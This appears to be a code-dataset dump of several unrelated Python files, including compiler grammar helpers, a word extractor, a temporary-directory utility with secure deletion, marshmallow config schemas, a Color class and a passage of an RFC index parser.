content
stringlengths 5
1.05M
|
|---|
from cmp.pycompiler import Production, Sentence, Symbol, EOF, Epsilon
class ContainerSet:
def __init__(self, *values, contains_epsilon=False):
self.set = set(values)
self.contains_epsilon = contains_epsilon
def add(self, value):
n = len(self.set)
self.set.add(value)
return n != len(self.set)
def extend(self, values):
change = False
for value in values:
change |= self.add(value)
return change
def set_epsilon(self, value=True):
last = self.contains_epsilon
self.contains_epsilon = value
return last != self.contains_epsilon
def update(self, other):
n = len(self.set)
self.set.update(other.set)
return n != len(self.set)
def epsilon_update(self, other):
return self.set_epsilon(self.contains_epsilon | other.contains_epsilon)
def hard_update(self, other):
return self.update(other) | self.epsilon_update(other)
def find_match(self, match):
for item in self.set:
if item == match:
return item
return None
def __len__(self):
return len(self.set) + int(self.contains_epsilon)
def __str__(self):
return '%s-%s' % (str(self.set), self.contains_epsilon)
def __repr__(self):
return str(self)
def __iter__(self):
return iter(self.set)
def __nonzero__(self):
return len(self) > 0
def __eq__(self, other):
if isinstance(other, set):
return self.set == other
return isinstance(other, ContainerSet) and self.set == other.set and self.contains_epsilon == other.contains_epsilon
def inspect(item, grammar_name='G', mapper=None):
try:
return mapper[item]
except (TypeError, KeyError ):
if isinstance(item, dict):
items = ',\n '.join(f'{inspect(key, grammar_name, mapper)}: {inspect(value, grammar_name, mapper)}' for key, value in item.items() )
return f'{{\n {items} \n}}'
elif isinstance(item, ContainerSet):
args = f'{ ", ".join(inspect(x, grammar_name, mapper) for x in item.set) } ,' if item.set else ''
return f'ContainerSet({args} contains_epsilon={item.contains_epsilon})'
elif isinstance(item, EOF):
return f'{grammar_name}.EOF'
elif isinstance(item, Epsilon):
return f'{grammar_name}.Epsilon'
elif isinstance(item, Symbol):
return f"G['{item.Name}']"
elif isinstance(item, Sentence):
items = ', '.join(inspect(s, grammar_name, mapper) for s in item._symbols)
return f'Sentence({items})'
elif isinstance(item, Production):
left = inspect(item.Left, grammar_name, mapper)
right = inspect(item.Right, grammar_name, mapper)
return f'Production({left}, {right})'
elif isinstance(item, tuple) or isinstance(item, list):
ctor = ('(', ')') if isinstance(item, tuple) else ('[',']')
return f'{ctor[0]} {("%s, " * len(item)) % tuple(inspect(x, grammar_name, mapper) for x in item)}{ctor[1]}'
else:
raise ValueError(f'Invalid: {item}')
def pprint(item, header=""):
if header:
print(header)
if isinstance(item, dict):
for key, value in item.items():
print(f'{key} ---> {value}')
elif isinstance(item, list):
print('[')
for x in item:
print(f' {repr(x)}')
print(']')
else:
print(item)
class Token:
"""
Basic token class.
Parameters
----------
lex : str
Token's lexeme.
token_type : Enum
Token's type.
"""
def __init__(self, lex, token_type):
self.lex = lex
self.token_type = token_type
def __str__(self):
return f'{self.token_type}: {self.lex}'
def __repr__(self):
return str(self)
@property
def is_valid(self):
return True
class UnknownToken(Token):
def __init__(self, lex):
Token.__init__(self, lex, None)
def transform_to(self, token_type):
return Token(self.lex, token_type)
@property
def is_valid(self):
return False
|
'''
Faça um programa que leia 5 números e informe o maior número.
'''
num_2 = 0
for i in range(0,5):
num_1 = float(input('Digite um numero: '))
if num_1 > num_2:
num_2 = num_1
print(num_2)
|
from threading import Thread, Lock
class WordExtractor:
INVALID_CHARACTERS = ["'", ",", ".", "/", "?", ";", ":", "(", ")", "+", "*", "[", "]", "{", "}", "&", "$", "@", "#", "%", "\"", "|", "\\", ">", "<", "!", "=", "(", ")", "`"]
NUMBERS = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "0"]
HIFEN = "-"
ENCODING = "utf-8"
MAX_THREADS = 100
def __init__(self):
self._word_dict = {}
self._lock = Lock()
def _treat_word(self, word):
word = str(word.encode(WordExtractor.ENCODING)).lstrip("b").strip("'")
word = word.replace("\\", "")
for character in WordExtractor.INVALID_CHARACTERS:
word = word.strip(character).strip(character)
if(character in word):
return None
for character in WordExtractor.NUMBERS:
if(character in word):
return None
word = word.strip(WordExtractor.HIFEN).strip(WordExtractor.HIFEN)
if(len(word) <= 3):
return None
word = word.lower()
return word
def _add_word_to_dictionary(self, word):
with self._lock:
number_of_ocurrences = self._word_dict.get(word, 0) + 1
self._word_dict[word] = number_of_ocurrences
def _collect_words(self, data):
word_list = data.split()
for word in word_list:
word = self._treat_word(word)
if(word is not None):
self._add_word_to_dictionary(word)
def extract_words(self, data_list):
self._word_dict = {}
thread_list = []
for data in data_list:
thread = Thread(target=self._collect_words, args=([data]))
if(len(thread_list) >= WordExtractor.MAX_THREADS):
oldest_thread = thread_list[0]
oldest_thread.join()
del(thread_list[0])
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
treated_word_list = self._word_dict.keys()
return treated_word_list
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 22 21:36:57 2019
@author: SJ
"""
import numpy as np
import pickle
import scipy
def corr(a,b,doy):
elliptical_orbit_correction = 0.03275104*np.cos(doy/59.66638337) + 0.96804905
a *= elliptical_orbit_correction
b *= elliptical_orbit_correction
return a,b
fpath = r'E:\S2A_MSI\Continental\view_zenith_0\lut\iLUTs\S2A_MSI_02.ilut'
with open(fpath,"rb") as ilut_file:
iLUT = pickle.load(ilut_file)
'''
solar zentith [degrees] (0 - 75)
water vapour [g/m2] (0 - 8.5)
ozone [cm-atm] (0 - 0.8)
aerosol optical thickness [unitless] (0 - 3)
surface altitude [km] (0 - 7.75)
'''
aots = [0.125, 0.375, 0.625, 0.875, 1.125, 1.375, 1.875, 2.625]
sz = 60
wv = 5
o3 = 0.3
aot = 0.5
km = 0.2
a, b = iLUT(sz, wv, o3, aot, km)
doy = 154
#%%
Ls = np.arange(1,100,0.1)
aots = np.arange(0.01,2.0,0.02)
#sr = (L-a)/b
#%%
ab = []
if True:
for aot in aots:
a,b = iLUT(sz, wv, o3, aot, km)
a,b = corr(a,b,doy)
ab.append([a,b,aot])
Ls = np.arange(1,100,0.1)
tb = np.zeros([Ls.shape[0],len(ab)+1])
count = 0
tb[:,0] = Ls
for each in ab:
count += 1
tb[:,count] = (Ls - each[0])/each[1]
|
# encoding:utf-8
|
#!/usr/bin/env python
"""A module and command line tool for working with temporary directories."""
import calendar
import contextlib
import os
import os.path
import random
import shlex
import shutil
import string
import subprocess
import sys
import time
import tarfile
import tempfile
import zipfile
__version_info__ = 0, 0, 0, "DEV", int(calendar.timegm(time.gmtime()))
__version__ = ".".join(str(part) for part in __version_info__)
__website__ = "https://github.com/jeremybanks/tmpdir"
__author__ = "Jeremy Banks <jeremy@jeremybanks.ca>"
__copyright__ = "Copyright 2011 Jeremy Banks <jeremy@jeremybanks.ca>"
__license__ = "MIT"
__full_license = """\
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE."""
class TmpDir(object):
"""A convenient temporary directory.
The constructor has two optional arguments.
inner_name is the basename of the temporary directory.
secure uses the srm command on the directory once closed (slow).
if "attempt" will not fail if insecure.
"""
def __init__(self, inner_name=None, deletion=False):
self.closed = True
if deletion not in ("secure", "attempt-secure", "pseudo-secure",
"not-secure"):
raise ArgumentError("Invalid deletion type.")
if deletion in ("secure", "attempt-secure"):
# confirm availability of secure remove command
try:
subprocess.check_call("which srm >/dev/null", shell=True)
deletion = "secure"
except subprocess.CalledProcessError, e:
if deletion == "attempt-secure":
deletion = "pseudo-secure"
else:
raise e
self.deletion = deletion
self.__outer_path = tempfile.mkdtemp()
self.inner_name = inner_name or "tmp"
self.path = os.path.abspath(
os.path.join(self.__outer_path, self.inner_name))
os.mkdir(self.path)
self.closed = False
def close(self):
if not self.closed:
# move to a new path to immediately invalidate paths being deleted
tmp_path = tempfile.mkdtemp()
new_path = os.path.abspath(os.path.join(tmp_path, rand_name()))
os.rename(self.path, new_path)
self.closed = True
self.path = new_path
if not self.deletion:
shutil.rmtree(tmp_path)
shutil.rmtree(self.__outer_path)
elif self.deletion == "pseudo-secure":
pseudosecure_delete_directory(tmp_path)
pseudosecure_delete_directory(self.__outer_path)
else:
subprocess.check_call(["srm", "-rfs", "--", tmp_path])
subprocess.check_call(["srm", "-rfs", "--", self.__outer_path])
def __del__(self):
self.close()
##### Context Managers
#
# .as_cwd() # changes CWD to path, restores previous value on exit
# .__enter__() # .close()es/deletes directory on exit
def as_cwd(self):
"""Use .path as the cwd, restoring old one on exit."""
return WorkingDirectoryContextManager(self.path)
def __enter__(self):
return self
def __exit__(self, xt, xv, tb):
self.close()
#### Serialization (tar)
#
# @classmethod .load(f, compression=None)
# .dump(f, compression="gz")
@classmethod
def load(cls, f, compression=None, inner_name=None, deletion=None):
"""Loads a temp directory from an optionally-compressed tar file.
If compression is None, it will read the first two bytes of the
stream to look for gzip or bz2 magic numbers, then seek back. To
disable this (if your file object doesn't support it) you can use
the null string "" to indicate an uncompressed tar. Other args
are "bz2" and "gz".
"""
if inner_name is None and hasattr(f, "inner_name"):
inner_name = os.path.splitext(os.path.split(f.inner_name)[0])[0]
if compression is None:
compression = sniff_archive_type(f, "tar")
mode = mode="r:" + compression
self = cls(inner_name, deletion)
if compression == "zip":
archive = zipfile.ZipFile(f, mode="r")
archive_infos = archive.infolist()
else:
if compression == "tar":
compression = ""
archive = tarfile.open(fileobj=f, mode="r:" + compression)
archive_infos = iter(archive)
with self.as_cwd():
with contextlib.closing(archive) as archive:
for file_info in archive_infos:
try:
filename = file_info.name
except AttributeError:
filename = file_info.filename
abs_path = os.path.abspath(os.path.join(self.path, filename))
if os.path.commonprefix((abs_path, self.path)) != self.path:
raise ValueError("illegal (external) path in archive", abs_path)
dir_, base = os.path.split(filename)
if dir_ and not os.path.exists(dir_):
os.makedirs(dir_)
if base:
archive.extract(file_info)
return self
def dump(self, f, compression=None):
"""Dumps a compressed-by-default tar of the directory to a file."""
if compression is None:
compression = sniff_archive_type(f, "gz")
if compression == "zip":
archive = zipfile.ZipFile(f, mode="w")
archive_add = archive.write
else:
if compression == "tar":
compression = ""
archive = tarfile.open(fileobj=f, mode="w:" + compression)
archive_add = archive.add
with contextlib.closing(archive) as tar:
with self.as_cwd():
for (path, dirs, files) in os.walk("."):
for filename in files:
archive_add(os.path.join(path, filename))
if compression != "zip":
for dirname in dirs:
archive_add(os.path.join(path, dirname))
class WorkingDirectoryContextManager(object):
def __init__(self, path, value=None):
self.path = path
self.value = value
self.previous_paths = []
def __enter__(self):
self.previous_paths.append(os.getcwd())
os.chdir(self.path)
return self.value
def __exit__(self, xt, xv, tb):
os.chdir(self.previous_paths.pop())
def sniff_archive_type(f, default="tar"):
"""Attempts to determine the type of an archive.
Uses file extensions and magic numbers."""
types_by_extension = {
".bz2": "bz2",
".tbz": "bz2",
".tb2": "bz2",
".tbz2": "bz2",
".zip": "zip",
".gzip": "gz",
".gz": "gz",
".tgz": "gz",
".tar": "tar"
}
if isinstance(f, (str, unicode)):
_name = f
class f(object):
name = _name
if hasattr(f, "name"):
ext = os.path.splitext(f.name)[1]
if ext in types_by_extension:
return types_by_extension[ext]
if hasattr(f, "seek") and hasattr(f, "tell") and "r" in getattr(f, "mode", ""):
start = f.tell()
leading_two = f.read(2)
f.seek(start)
if leading_two == b"\x1F\x8B":
return "gz"
elif leading_two == b"BZ":
return "bz2"
elif leading_two == b"PK":
return "zip"
else:
f.seek(257, os.SEEK_CUR)
ustar = f.read(5)
f.seek(start)
if ustar == b"ustar":
return "tar"
return default
def rand_name(length=8, chars=string.ascii_letters + string.digits + "_"):
return "".join(random.choice(chars) for i in range(length))
def pseudosecure_delete_directory(path):
# zero out each file
for (subpath, dirs, files) in os.walk(path):
for filename in files:
filepath = os.path.abspath(os.path.join(path, subpath, filename))
bytes_to_overwrite = os.path.getsize(filepath)
with open(filepath, "r+") as f:
f.seek(0)
while bytes_to_overwrite > 0:
n = min(bytes_to_overwrite, 1024)
f.write(b"\x00" * n)
f.flush()
os.fsync(f.fileno())
bytes_to_overwrite -= n
# rename each file and directory randomly
for (subpath, dirs, files) in os.walk(path, topdown=False):
for filename in list(files):
filepath = os.path.abspath(os.path.join(os.path.join(path, subpath), filename))
randpath = os.path.abspath(os.path.join(os.path.join(path, subpath), rand_name(8) + ".tmp"))
os.rename(filepath, randpath)
for dirname in list(dirs):
dirpath = os.path.abspath(os.path.join(os.path.join(path, subpath), dirname))
randpath = os.path.abspath(os.path.join(os.path.join(path, subpath), rand_name(8)))
os.rename(dirpath, randpath)
# delete everything, bottom-up
for (subpath, dirs, files) in os.walk(path, topdown=False):
for filename in files:
filepath = os.path.abspath(os.path.join(os.path.join(path, subpath), filename))
os.remove(filepath)
for dirname in dirs:
dirpath = os.path.abspath(os.path.join(os.path.join(path, subpath), dirname))
os.rmdir(dirpath)
# remove the top directory itself
shutil.rmtree(path)
def main(*raw_args):
import argparse
import tmpdir
parser = argparse.ArgumentParser(description="""\
Creates a temporary directory, optionally loading the contents of an archive
(tar, tgz, tbz2 or zip). If run from a shell, opens a bash login shell inside
the directory. Otherwise by default I'll prompt for a newline then exit, but
any other command can be specified.
If an empty directory is created, I automatically attempt to delete it
securely. In other cases, use the args.""")
parser.add_argument(dest="archive", metavar="$ARCHIVE", nargs="?",
help="loads an archive into the directory.")
parser.add_argument("-o", "--out", dest="out",
action="store", type=str, metavar="$ARCHIVE",
help="saves directory as an archive.")
command_options = parser.add_mutually_exclusive_group()
command_options.add_argument("-c", "--command", dest="command",
action="store", type=str, metavar="$COMMAND",
help="run this command in directory instead of default")
command_options.add_argument("-s", "--shell", dest="shell_command",
action="store", type=str, metavar="$COMMAND",
help="as --command, but run in /bin/sh/")
parser.add_argument("-d", "--delete", dest="deletion", metavar="$SECURITY",
choices=["secure", "pseudo-secure", "attempt-secure",
"not-secure"],
help="Specifies the deletion method/security.")
parser.add_argument("-r", "--on-error", dest="on_error", metavar="$ON_ERROR",
choices=["ignore", "fail", "abort"], default="fail")
parser.set_defaults(deletion=None, archive=None, out=None, command=None,
shell_command=None)
args = parser.parse_args(list(raw_args))
if args.command is None:
if args.shell_command is not None:
command = ["/bin/sh", "-c", args.shell_command]
elif hasattr(sys.stdin, "isatty") and sys.stdin.isatty():
command = ["bash", "--login"]
else:
command = ["read", "-p", "Press enter to delete directory..."]
else:
command = shlex.split(args.command)
path = args.archive
deletion = args.deletion
if path is None:
if deletion is None:
deletion = "attempt-secure"
sys.stderr.write("Initializing temporary directory... ")
d = tmpdir.TmpDir(deletion=deletion)
else:
if deletion is None:
deletion = "not-secure"
sys.stderr.write("Loading archive to temporary directory... ")
with open(path, "rb") as f:
d = TmpDir.load(f, inner_name=os.path.basename(path), deletion=deletion)
with d:
sys.stderr.write("(deletion: %s)\n" % (d.deletion))
sys.stderr.flush()
print d.path
sys.stderr.write("----" * 4 + "\n")
if len(command) == 3 and command[:2] == ["read", "-p"]:
sys.stderr.write(command[2])
sys.stderr.flush()
sys.stdin.read(1)
sub_status = 0
else:
env = dict(os.environ)
env["HISTFILE"] = ""
sub_status = subprocess.call(command, cwd=d.path, env=env)
if sub_status and args.on_error != "ignore":
our_status = sub_status
else:
our_status = 0
sys.stderr.write("----" * 4 + "\n")
if args.out and not (sub_status != 0 and args.on_error == "abort"):
sys.stderr.write("Archiving directory contents...\n")
sys.stderr.flush()
with open(args.out, "wb") as f:
d.dump(f)
sys.stderr.write("Deleting temporary directory... ")
sys.stderr.write("(deletion: %s)\n" % (d.deletion))
sys.stderr.flush()
return our_status
if __name__ == "__main__":
sys.exit(main(*sys.argv[1:]))
|
from typing import Any, Dict, Type
from marshmallow import fields, post_load
from marshmallow_enum import EnumField
from marshmallow_oneofschema import OneOfSchema
from mf_horizon_client.data_structures.configs.stage_config import (
BacktestStageConfig,
FeatureGenerationStageConfig,
FilterStageConfig,
PredictionStageConfig,
ProblemSpecificationConfig,
RefinementStageConfig,
StationarisationStageConfig,
)
from mf_horizon_client.data_structures.configs.stage_config_enums import (
CorrelationMethod,
FeatureGeneratorType,
RegressorType,
StationarisationStrategy,
TargetTransformType,
)
from mf_horizon_client.data_structures.configs.stage_types import StageType
from mf_horizon_client.schemas.schema import CamelCaseSchema
from mf_horizon_client.utils.string_case_converters import force_camel_case
class FilteringConfigSchema(CamelCaseSchema):
method = EnumField(CorrelationMethod, required=True)
max_n_features = fields.Integer(required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> FilterStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a filter stage config object.
"""
return FilterStageConfig(**data)
class StationarisationConfigSchema(CamelCaseSchema):
adf_threshold = fields.Float(required=True)
strategy = EnumField(StationarisationStrategy, required=True)
target_transform = EnumField(TargetTransformType, required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> StationarisationStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a stationarisation stage config object.
"""
return StationarisationStageConfig(**data)
class ProblemSpecConfigSchema(CamelCaseSchema):
target_features = fields.List(fields.String(required=False))
horizons = fields.List(fields.Integer(required=True))
data_split = fields.Float(required=True)
used_in_lstm = fields.Boolean(required=False, allow_none=True)
active_columns = fields.List(fields.Integer(required=False))
scale_factor_multiplier = fields.Float(required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> ProblemSpecificationConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a problem specification stage config object.
"""
return ProblemSpecificationConfig(**data)
class BacktestConfigSchema(CamelCaseSchema):
n_backtests = fields.Integer(required=True)
fold_train_frac = fields.Float(required=True)
gapping_factor = fields.Float(required=True)
regressor = EnumField(RegressorType, required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> BacktestStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a backtest stage config object.
"""
return BacktestStageConfig(**data)
class RefinementConfigSchema(CamelCaseSchema):
min_features = fields.Integer(required=True)
max_features = fields.Integer(required=True)
early_stopping_sensitivity = fields.Float(required=True)
deep_search = fields.Boolean(required=True)
regressor = EnumField(RegressorType, required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> RefinementStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a refinement stage config object.
"""
return RefinementStageConfig(**data)
class FeatureGenerationConfigSchema(CamelCaseSchema):
max_n_features = fields.Integer(required=True)
feature_generators = fields.List(EnumField(FeatureGeneratorType, required=True))
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> FeatureGenerationStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a feature generation stage config object.
"""
return FeatureGenerationStageConfig(**data)
class PredictionConfigSchema(CamelCaseSchema):
regressor = EnumField(RegressorType, required=True)
@post_load # type: ignore
def make( # pylint: disable=no-self-use
self,
data: Any,
many: bool, # pylint: disable=unused-argument
partial: bool, # pylint: disable=unused-argument
) -> PredictionStageConfig:
"""
Marshmallow function, invoked after validating and loading json data. Converts
dictionary loaded from json into a prediction stage config object.
"""
return PredictionStageConfig(**data)
@property
def valid_configuration_values(self) -> bool:
return True
class ConfigMultiplexSchema(OneOfSchema): # type: ignore
type_schemas = {
StageType.filtering.name: FilteringConfigSchema,
StageType.problem_specification.name: ProblemSpecConfigSchema,
StageType.stationarisation.name: StationarisationConfigSchema,
StageType.feature_generation.name: FeatureGenerationConfigSchema,
StageType.backtest.name: BacktestConfigSchema,
StageType.refinement.name: RefinementConfigSchema,
StageType.prediction.name: PredictionConfigSchema,
}
config_lookup: Dict[Type[Any], str] = {
FilterStageConfig: StageType.filtering.name,
ProblemSpecificationConfig: StageType.problem_specification.name,
StationarisationStageConfig: StageType.stationarisation.name,
FeatureGenerationStageConfig: StageType.feature_generation.name,
BacktestStageConfig: StageType.backtest.name,
RefinementStageConfig: StageType.refinement.name,
PredictionStageConfig: StageType.prediction.name,
}
def get_obj_type(self, obj: Type[Any]) -> str:
try:
return self.config_lookup[type(obj)]
except KeyError:
raise TypeError(f"Unrecognised type {type(obj)} for multiplex schema, " f"{self.__class__}")
def on_bind_field(self, field_name, field_obj):
field_obj.data_key = force_camel_case(field_obj.data_key or field_name)
|
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import Any, TypeGuard, overload, ClassVar
from typing_extensions import Self, LiteralString
from tg_gui_core.shared import IsinstanceBase
# OPTIMIZATION: # from tg_gui_core.implementation_support import isoncircuitpython
from .stateful import State
class Color(int, IsinstanceBase):
white: ClassVar[Color | State[Color]] = 0xFFFFFF # type: ignore[override]
black: ClassVar[Color | State[Color]] = 0x000000 # type: ignore[override]
gray: ClassVar[Color | State[Color]] = 0x808080 # type: ignore[override]
lightgray: ClassVar[Color | State[Color]] = 0xC0C0C0 # type: ignore[override]
darkgray: ClassVar[Color | State[Color]] = 0x404040 # type: ignore[override]
# TODO:P revise these or change them per-platform
red: ClassVar[Color | State[Color]] = 0xFF0000 # type: ignore[override]
orange: ClassVar[Color | State[Color]] = 0xFFA500 # type: ignore[override]
yellow: ClassVar[Color | State[Color]] = 0xFFFF00 # type: ignore[override]
green: ClassVar[Color | State[Color]] = 0x00FF00 # type: ignore[override]
blue: ClassVar[Color | State[Color]] = 0x0000FF # type: ignore[override]
purple: ClassVar[Color | State[Color]] = 0x800080 # type: ignore[override]
# --- system colors ---
# text forground
foreground: ClassVar[Color | State[Color]] = 0xFFFFFF # type: ignore[override]
fill: ClassVar[Color | State[Color]] = lightgray # type: ignore[override]
def __new__(cls, rgb_value: int) -> Color:
"""
:param value: The int to convert to a Color.
(lie to the type system and check it with IsinstanceBase's _inst_isinstance_check_)
"""
assert isinstance(rgb_value, int)
if not (0 <= rgb_value <= 0xFFFFFF):
raise TypeError(
f"Color must be an integer between 0 and 0xFFFFFF, not {rgb_value}"
)
# OPTIMIZATION: # if isoncircuitpython():
return rgb_value # type: ignore[return-value]
# OPTIMIZATION: # else:
# OPTIMIZATION: # return int.__new__(cls, rgb_value)
# OPTIMIZATION: # if isoncircuitpython():
@classmethod
def _inst_isinstance_check_(cls, __instance: Any) -> TypeGuard[Self]:
return isinstance(__instance, int) and 0 <= __instance <= 0xFFFFFF
if TYPE_CHECKING:
@overload
@classmethod
def fromrgb(cls, r: int, g: int, b: int) -> Color:
...
@overload
@classmethod
def fromrgb(cls, r: float, g: int, b: int) -> Color:
...
@classmethod
def fromrgb(cls, r: int | float, g: int | float, b: int | float) -> Color:
"""
Combines the red, green, and blue components into a single integer
:param r: red component, int (0-255) or float (0.0-1.0)
:param g: green component, int (0-255) or float (0.0-1.0)
:param b: blue component, int (0-255) or float (0.0-1.0)
:return: the combined color as in int
"""
r = int(r * 255) if isinstance(r, float) else r
g = int(g * 255) if isinstance(g, float) else g
b = int(b * 255) if isinstance(b, float) else b
return cls((r << 16) | (g << 8) | (b << 0))
@classmethod
def fromhex(cls, hex: LiteralString) -> Color:
"""
Takes a hex string of the form '#RRGGBB', '#RGB', format and returns a color
:param hex: the hex string
:return: the color as an int
"""
_hex = str(hex)
assert hex.startswith("#") and (
len(_hex) in (7, 4)
), f"hex string must be '#RRGGBB' or '#RGB' format, not '{hex}'"
# remove the #
src: str = _hex[1:]
# if it is 3 characters, double each character
if len(src) == 2:
src = src[0] * 2 + src[1] * 2 + src[2] * 2
return cls(int(src, 16))
def __int__(self) -> int:
return self # type: ignore[return-value]
|
import json, os, shutil, re, sys
import urllib.request
import requests
import time
import argparse
from summaries import RFCsSummaries
from groups import RFCsGroups
# Adapted from https://github.com/AndreaOlivieri/rfc2json.git
__COMPLETE_REGEX__ = r"\n(\d{4})\s(?:(Not Issued)|(?:((?:.|\s)+?(?=\.\s*\(Format))(?:\.\s*\((Format[^\)]*)\))?\s*(?:\((Obsoletes[^\)]*)\))?\s*(?:\((Obsoleted\s*by[^\)]*)\))?\s*(?:\((Updates[^\)]*)\))?\s*(?:\((Updated\s*by[^\)]*)\))?\s*(?:\((Also[^\)]*)\))?\s*(?:\((Status[^\)]*)\))?\s*(?:\((DOI[^\)]*)\))?))"
__DATE_REGEX__ = r"(?:(January|February|March|April|May|June|July|August|September|October|November|December)\s*(\d{4}))"
__FORMAT_REGEX__ = r"Format:?\s*(.*)"
__ALSO_FYI_REGEX__ = r"Also:?\s*(.*)"
__STATUS_REGEX__ = r"Status:?\s*(.*)"
__DOI_REGEX__ = r"DOI:?\s*(.*)"
__AUTHORS_REGEX__ = r"(?:((?:[A-Z]\.)+\s[^,\.]*)[,\.]\s?)+?"
__RFC_REGEX__ = r"\s?(?:([A-Z0-9]{4,})(?:,\s)?)+?"
class RFCsGraph():
def __init__(self, rpki_rfcs_file, rfcs_index_file=None, templates_path=None, summaries_result_file=None, groups_file=None, graph_file=None):
self.summaries = {}
self.groups = {}
self.rpki_rfcs = set()
self.__RFC_INDEX_URL__ = "https://www.rfc-editor.org/rfc/rfc-index.txt"
if not templates_path:
self.summaries_folder = "./summaries"
else:
self.summaries_folder = templates_path
if not summaries_result_file:
self.summaries_filename = "./data/rfcs_summaries.json"
else:
self.summaries_filename = summaries_result_file
if not groups_file:
self.groups_file = "./data/rfcs_groups.json"
else:
self.groups_file = groups_file
self.rpki_rfcs_file = rpki_rfcs_file
if not rfcs_index_file:
self.rfcs_index_file = "./data/rfc-index.txt"
else:
self.rfcs_index_file = rfcs_index_file
self.rfcs_json_obj = {}
self.d3js_data = []
if not graph_file:
self.graph_file = "./data/rfcs_data.json"
else:
self.graph_file = graph_file
def get_rpki_rfcs(self, filename):
result = set()
try:
with open(filename) as f:
for line in f:
result.add(line.rstrip())
except:
return False
return sorted([int(i) for i in result])
def get_rfcs_index(self, rfcs_index_file):
try:
INTERVAL= 4
INTERVAL_TIMESTAMP = INTERVAL * 60 * 60
now = time.time()
if not os.path.isfile(rfcs_index_file):
r = requests.get(self.__RFC_INDEX_URL__)
with open(rfcs_index_file, 'wb') as f:
f.write(r.content)
else:
stat = os.stat(rfcs_index_file)
if now > (stat.st_mtime + INTERVAL_TIMESTAMP):
r = requests.get(self.__RFC_INDEX_URL__)
with open(rfcs_index_file, 'wb') as f:
f.write(r.content)
except:
return False
return rfcs_index_file
def clean_text(self, text):
return re.sub('\s+', ' ', text).strip()
def clear_rfc(self, rfc_list):
rfcs = []
for rfc in rfc_list:
if (rfc.startswith("RFC")):
rfcs.append(rfc)
return rfcs
# Adapted from https://github.com/AndreaOlivieri/rfc2json.git
def parse_rfc_meta(self, match, rfc_number, json_obj):
if re.search("Not Issued", match[1]):
json_obj[rfc_number] = "Not Issued"
else:
json_sub_obj = {}
title_authours_date = self.clean_text(match[2])
authors = re.findall(__AUTHORS_REGEX__, title_authours_date)
title = re.sub(__AUTHORS_REGEX__, '', title_authours_date, re.MULTILINE | re.UNICODE | re.DOTALL)
json_sub_obj["authors"] = authors
date = re.findall(__DATE_REGEX__, title_authours_date)[0]
month = date[0]
year = date[1]
json_sub_obj["title"] = title.replace(". "+month+" "+year, "")
json_sub_obj["issue_data"] = {
"month": month,
"year": year
}
if match[3]!="": json_sub_obj["format"] = re.findall(__FORMAT_REGEX__, self.clean_text(match[3]))[0]
if match[4]!="": json_sub_obj["obsolets"] = self.clear_rfc(re.findall(__RFC_REGEX__, self.clean_text(match[4])))
if match[5]!="": json_sub_obj["obsoleted_by"] = self.clear_rfc(re.findall(__RFC_REGEX__, self.clean_text(match[5])))
if match[6]!="": json_sub_obj["updates"] = self.clear_rfc(re.findall(__RFC_REGEX__, self.clean_text(match[6])))
if match[7]!="": json_sub_obj["updated_by"] = self.clear_rfc(re.findall(__RFC_REGEX__, self.clean_text(match[7])))
if match[8]!="": json_sub_obj["also_fyi"] = re.findall(__ALSO_FYI_REGEX__, self.clean_text(match[8]))[0]
if match[9]!="": json_sub_obj["status"] = re.findall(__STATUS_REGEX__, self.clean_text(match[9]))[0]
if match[10]!="": json_sub_obj["doi"] = re.findall(__DOI_REGEX__, self.clean_text(match[10]))[0]
json_obj[rfc_number] = json_sub_obj
def rfcs_json_data(self):
rfc_index_text = open(self.rfcs_index_file).read()
rfcs_json_obj = {}
matches = re.findall(__COMPLETE_REGEX__, rfc_index_text)
for match in matches:
rfc_number = match[0]
self.parse_rfc_meta(match, rfc_number, rfcs_json_obj)
return rfcs_json_obj
def rfcs_name_category(self, data):
categories = {}
rfcs_map = {}
for k,v in data.items():
if v == 'Not Issued':
continue
status = v['status']
caterogy_id = "_".join(status.split(" "))
# Special case
if int(k) == 4271:
caterogy_id = "PROPOSED_STANDARD"
